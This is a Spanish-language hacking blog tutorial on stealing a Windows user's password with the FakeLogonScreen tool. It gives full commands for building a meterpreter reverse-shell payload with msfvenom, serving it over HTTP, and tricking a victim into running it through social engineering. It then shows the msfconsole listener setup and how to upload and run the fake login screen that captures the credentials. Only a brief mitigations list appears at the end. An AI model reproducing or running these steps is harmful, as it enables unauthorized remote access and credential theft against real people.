Descarga tu guía de trucos informáticos aquí
Robar Contraseña Windows usando FakeLogonScreen
Robar Contraseña Windows usando FakeLogonScreen

Robar Contraseña de Windows usando FakeLogonScreen

En este truco hacking nos centraremos en una herramienta que crea una pantalla de inicio de sesión falsa de Windows y luego obliga al usuario a ingresar las credenciales (contraseña) correctas y luego transmitir las credenciales al atacante. Puede funcionar en diferentes escenarios.

Esta herramienta fue desarrollada por Arris Huijgen. Ya he hablado sobre el funcionamiento de la herramienta. No hace mucho más que eso. Para comprender mejor el funcionamiento de esta herramienta, realizaré una práctica sobre dicha herramienta utilizando los sistemas configurados como se muestra.

1. Preparativos

  • Descarga los ejecutables para la práctica haciendo clic aquí. (Descomprime el ZIP y quédate con los .exe)
  • Atacante: Parrot OS (puedes utilizar una de las 5 mejores distros Linux para pruebas de seguridad)
  • IP Atacante: Mi IP local en este caso es 192.168.1.58
  • Víctima: Windows 10 (compilación 18363)

2. Cargar el Payload

Digamos que hay un sistema que está conectado a la misma red que el atacante y el atacante está buscando las credenciales del sistema ‘víctima’. La información que el atacante ya tiene es la dirección IP y el conocimiento del sistema operativo. Este tipo de información es bastante fácil de conseguir.


Creación de carga útil

Ahora, para comenzar, utilizaré la herramienta msfvenom para crear una carga útil (payload) de acuerdo con el sistema operativo de la víctima. Proporciono la dirección IP de mi PC como LHOST. Como la máquina víctima ejecutaba Windows, convierto mi payload en un archivo ejecutable que se puede ejecutar fácilmente. Después de crear la payload, ejecuto un Python one-liners (potencia en una sola línea) para crear un servidor HTTP que alojará la payload en el puerto 80 de la máquina víctima.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.58 lport=4444 -f exe >> payload.exe
python -m SimpleHTTPServer 80
Cargar payload en puerto 80
Cargar payload en puerto 80

3. Ingeniería social a la víctima

Ahora en un escenario de la vida real, el atacante usará algún tipo de ataque de ingeniería social para manipular al usuario objetivo para descargar esta payload maliciosa en su sistema. Esto se puede hacer mucho antes de realizar el ataque real.

Ingeniería social para descargar payload
Ingeniería social para descargar payload

Ya que tenemos nuestra payload lista y alojada. Ahora necesitamos iniciar un oyente donde recibiremos nuestra sesión de la payload. Después de la configuración adecuada, fui directamente a la máquina ‘víctima’ y ejecuté la payload. Nuevamente, esta es una demostración del entorno de laboratorio. Los escenarios de la vida real variarán.

4. Cargar el ejecutable FakeLogonScreen

msfconsole
Iniciar msfconsole
Iniciar msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.58
set lport 4444
run
Oyente de sesión Payload
Oyente de sesión Payload

Después de obtener la sesión de meterpreter, cargamos FakeLogonScreen.exe en el sistema de destino. Este ejecutable se puede encontrar en el directorio que descargamos al inicio. Después de una carga exitosa, llegamos a la línea de comando de la máquina de destino usando el comando shell. Ahora ejecutamos el ejecutable como se muestra en la imagen dada.

upload FakeLogonScreen.exe
shell
FakeLogonScreen.exe

O,

upload /ruta/de/FakeLogonScreen.exe C:\ruta\donde\se\almacenará
shell
FakeLogonScreen.exe
Cargar FakeLogonScreen en Windows
Cargar FakeLogonScreen en Windows

5. Robar contraseña administrador de Windows

Actualización!

El payload es detectado por Windows Defender. Aún puedes utilizarlo en caso tengas acceso físico a la PC víctima y ejecutar el EXE.

Tan pronto como ejecutamos el ejecutable a través del shell, todas las ventanas actuales en el sistema de destino se minimizan y aparece una pantalla de inicio de sesión como se muestra en la imagen a continuación. Esto parece una pantalla de inicio de sesión bastante real. El usuario objetivo asume que debe haber un cierre de sesión accidental. Entonces, para asumir su trabajo, el usuario ‘víctima’ ingresa sin saberlo las credenciales.

Ahora para demostrar que la contraseña está marcada, primero ingresé la contraseña incorrecta (esgeeks). La pantalla de inicio de sesión devolvió un error “The password is incorrect. Try again“. Esto prueba que el usuario objetivo tiene que ingresar las credenciales válidas para pasar.

Luego, ingresé las credenciales válidas y vemos que todas las ventanas minimizadas se restauran a su estado original.


Volvamos a nuestra máquina atacante para ver si pudimos obtener esas contraseñas. Como se muestra en la imagen a continuación, vemos que el oyente FakeLogonScreen funciona de manera similar a un registrador de teclas. Primero ingresé la “contraseña incorrecta” en el campo de contraseña para verificar los casos falsos. Luego ingrespe la contraseña correcta “jean” y obtuve con éxito la contraseña para el usuario ‘víctima’.

Robar Contraseña Windows con falso inicio sesión
Robar Contraseña Windows con falso inicio sesión

6. Información Adicional

  • Cuando se ejecuta en múltiples configuraciones de escritorio, todas las demás pantallas de escritorio se vuelven negras.
  • Si el usuario objetivo ha configurado un fondo personalizado, se muestra ese fondo personalizado. Este es un punto positivo en un entorno de oficina, ya que esos sistemas tienen una imagen de empresa personalizada para la pantalla de inicio de sesión.

También tenemos otro ejecutable en el archivo zip que descargamos anteriormente. Se llama “FakeLogonScreenToFile.exe“. Este archivo funciona de manera similar, pero junto con la visualización de la contraseña, almacena la contraseña en la siguiente ubicación:

%LOCALAPPDATA%\Microsoft\user.db

Esta herramienta también funciona en Windows 7. Además, puedes integrar esta herramienta para trabajar con Cobalt Strike. Mira aquí.

6.1. Mitigaciones

  • Verifica las fuentes de descarga.
  • Supervisa el directorio AppData para el archivo user.db.
  • Verifica correctamente todos los enlaces en la pantalla de inicio de sesión.
  • Implementa una política de cambio de contraseña de menor duración.

https://youtu.be/946iUGYr9lA

Artículos recomendados:

Si te gusta el contenido y deseas apoyar a la mejora del sitio web, considera hacer una contribución ¡haciendo clic aquí por favor!. ¡NO ES OBLIGATORIO, GRACIAS! :’)

¿Te ha gustado este artículo? Sigue este blog en su fanpage de  FacebookTwitterInstagram y/o YouTube para que no te pierdas del mejor contenido informático y hacking!

Más artículos
PatchChecker Verificar Vulnerabilidades PrivEsc Windows
PatchChecker: Verificar Vulnerabilidades de PrivEsc Windows